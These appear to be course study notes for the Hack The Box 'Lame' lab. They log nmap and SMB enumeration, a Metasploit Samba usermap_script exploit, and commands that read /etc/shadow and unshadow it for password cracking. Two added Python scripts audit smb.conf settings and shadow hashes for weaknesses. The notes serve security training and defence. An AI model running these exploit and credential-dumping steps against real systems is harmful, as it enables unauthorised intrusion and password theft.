TCM PEH Hacking Lame Notes


HTB Lame

Again, recording commands to derive methodology

nmap -A -T4 -p- 10.10.10.3
OR (much faster: sweep all ports first, then run the version/script scan only against the open ones)
nmap -T4 -p- 10.10.10.3
Then
nmap -A -T4 -p21,80,443,etc 10.10.10.3
Noted port 21 anonymous login is allowed
Noted port 139 version
Noted port 445 version
Noted port 3632 version
Noted Ubuntu OS


smbclient -L //10.10.10.3
enter (empty password at the prompt gives an anonymous session; backslashes would need escaping in the shell, so forward slashes are used)
Noted IPC$
Noted ADMIN$
Noted tmp
smbclient //10.10.10.3/tmp
enter
ls
dead end
smbclient //10.10.10.3/opt
and
smbclient '//10.10.10.3/ADMIN$'
can't authenticate, dead end


Googled samba version 3.0.20-debian exploit
Noted rapid7 link
Noted exploit-db link
Read rapid7 link


systemctl enable postgresql
systemctl start postgresql
msfconsole
use exploit/multi/samba/usermap_script
show options
set RHOSTS 10.10.10.3
show targets
exploit
whoami
hostname
pwd
cd home
ls
cd ../
ls
locate root.txt
updatedb (refresh the locate database first if the file is not found)
locate root.txt
locate user.txt
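The exploit module above works because the Samba server was configured with the "username map script" option, which hands a client-supplied name to an external program. The following audit script is an added example (not part of the original notes and not Samba's own tooling) that checks an smb.conf for that option, for "map to guest", and for guest-accessible or writable shares such as the tmp share found during enumeration. The sample configuration is constructed for illustration; the option names are real Samba parameters, the values are made up.

```python
"""Audit an smb.conf for the settings behind the Lame attack path.

Added example, not from the original notes.  The sample config below is
constructed; option names are real Samba parameters, values are made up.
"""
import re

SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   ; this option hands the client-supplied username to a shell command
   username map script = /etc/samba/scripts/mapusers.sh
   map to guest = bad user

[tmp]
   path = /tmp
   guest ok = yes
   writable = yes
   comment = guest scratch space

[opt]
   path = /opt
   guest ok = no
"""


def _truthy(value):
    """Samba boolean parsing: yes/true/1 are true, everything else false."""
    return value.strip().lower() in ("yes", "true", "1")


def parse_smb_conf(text):
    """Return {section: {key: value}} from smb.conf text.

    Keys are lower-cased with collapsed whitespace so 'guest ok' and
    'guest  ok' compare equal, as Samba itself treats them."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current][" ".join(key.lower().split())] = value.strip()
    return sections


def audit_smb_conf(text):
    """Return a list of (severity, finding) tuples for the config text."""
    conf = parse_smb_conf(text)
    findings = []
    g = conf.get("global", {})

    # 'username map script' runs an external program with the name the
    # client sent; that is the behaviour exploit/multi/samba/usermap_script
    # relies on.  Remove the option (and upgrade Samba) to close that path.
    if "username map script" in g:
        findings.append(("HIGH", "[global] 'username map script = %s' is set; "
                         "remove it or upgrade Samba" % g["username map script"]))

    if g.get("map to guest", "never").strip().lower() != "never":
        findings.append(("MEDIUM", "[global] 'map to guest = %s' lets failed "
                         "logins fall through to the guest account" % g["map to guest"]))

    for name, opts in conf.items():
        if name == "global":
            continue
        guest = _truthy(opts.get("guest ok", "no"))
        # 'writable' and 'writeable' are synonyms; both invert 'read only'
        writable = (_truthy(opts.get("writable", opts.get("writeable", "no")))
                    or not _truthy(opts.get("read only", "yes")))
        if guest and writable:
            findings.append(("HIGH", "[%s] is guest-accessible and writable" % name))
        elif guest:
            findings.append(("MEDIUM", "[%s] is guest-readable" % name))
    return findings


if __name__ == "__main__":
    for severity, finding in audit_smb_conf(SAMPLE_SMB_CONF):
        print(severity, finding)
```

Run it against a real /etc/samba/smb.conf by passing the file contents to audit_smb_conf(); a clean config returns an empty list.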


cat /etc/passwd
cat /etc/shadow
Copy /etc/passwd, paste into a file
Copy /etc/shadow, paste into another file
unshadow /path/to/passwd /path/to/shadow (unshadow ships with John the Ripper; redirect the output to a file for cracking)
See "cracking linux password hashes" videos for more info
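Read from the other side, the same /etc/shadow file tells an administrator which accounts are at risk before anyone runs a cracker over it. The script below is an added example, not from the original notes, that classifies each password field by its crypt(3) identifier and flags empty fields and legacy DES or MD5 hashes. The sample entries are constructed and every hash body is made up; only the format is real.

```python
"""Audit /etc/shadow-style entries for empty or weak password hashes.

Added example, not from the original notes.  SAMPLE_SHADOW is constructed;
the hash bodies are fake strings in the real crypt(3) layout.
"""

SAMPLE_SHADOW = """\
root:$6$saltsalt$FAKEHASHFAKEHASHFAKEHASHFAKEHASH:17000:0:99999:7:::
legacy:$1$abcdefgh$FAKEMD5CRYPTBODY:15000:0:99999:7:::
olddes:AbCdEfGhIjKlM:14000:0:99999:7:::
noauth::17000:0:99999:7:::
service:*:17000:0:99999:7:::
daemon:!:17000:0:99999:7:::
locked:!$6$saltsalt$FAKEHASHFAKEHASH:17000:0:99999:7:::
"""

# crypt(3) identifiers as they appear between the first two '$' signs.
ALGORITHMS = {
    "1": ("md5-crypt", "MEDIUM"),
    "2a": ("bcrypt", "OK"),
    "2b": ("bcrypt", "OK"),
    "2y": ("bcrypt", "OK"),
    "5": ("sha256-crypt", "OK"),
    "6": ("sha512-crypt", "OK"),
    "7": ("scrypt", "OK"),
    "y": ("yescrypt", "OK"),
    "gy": ("gost-yescrypt", "OK"),
}


def classify_hash(field):
    """Return (severity, description) for one shadow password field."""
    if field == "":
        return ("HIGH", "empty password field: the account logs in with no password")
    if field.startswith(("!", "*")):
        # '!' or '*' prefix: password disabled, or a hash that has been locked
        return ("OK", "password disabled or account locked")
    if field.startswith("$"):
        parts = field.split("$")
        ident = parts[1] if len(parts) > 1 else ""
        if ident in ALGORITHMS:
            name, severity = ALGORITHMS[ident]
            return (severity, name)
        return ("MEDIUM", "unrecognised crypt id '$%s$'" % ident)
    if len(field) == 13:
        # traditional DES crypt: 56-bit key and an 8-character password limit
        return ("HIGH", "traditional DES crypt, 8-character password limit")
    return ("MEDIUM", "unrecognised hash format")


def audit_shadow(text):
    """Return [(user, severity, description)] for every entry in the text."""
    findings = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) < 9:  # a well-formed shadow entry has nine fields
            findings.append((fields[0], "HIGH", "malformed entry (%d fields)" % len(fields)))
            continue
        severity, description = classify_hash(fields[1])
        findings.append((fields[0], severity, description))
    return findings


if __name__ == "__main__":
    for user, severity, description in audit_shadow(SAMPLE_SHADOW):
        print("%-8s %-6s %s" % (user, severity, description))
```

On a live host, run it as root over the contents of /etc/shadow; any HIGH line is an account that needs a password set or the hash regenerated with a modern algorithm.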
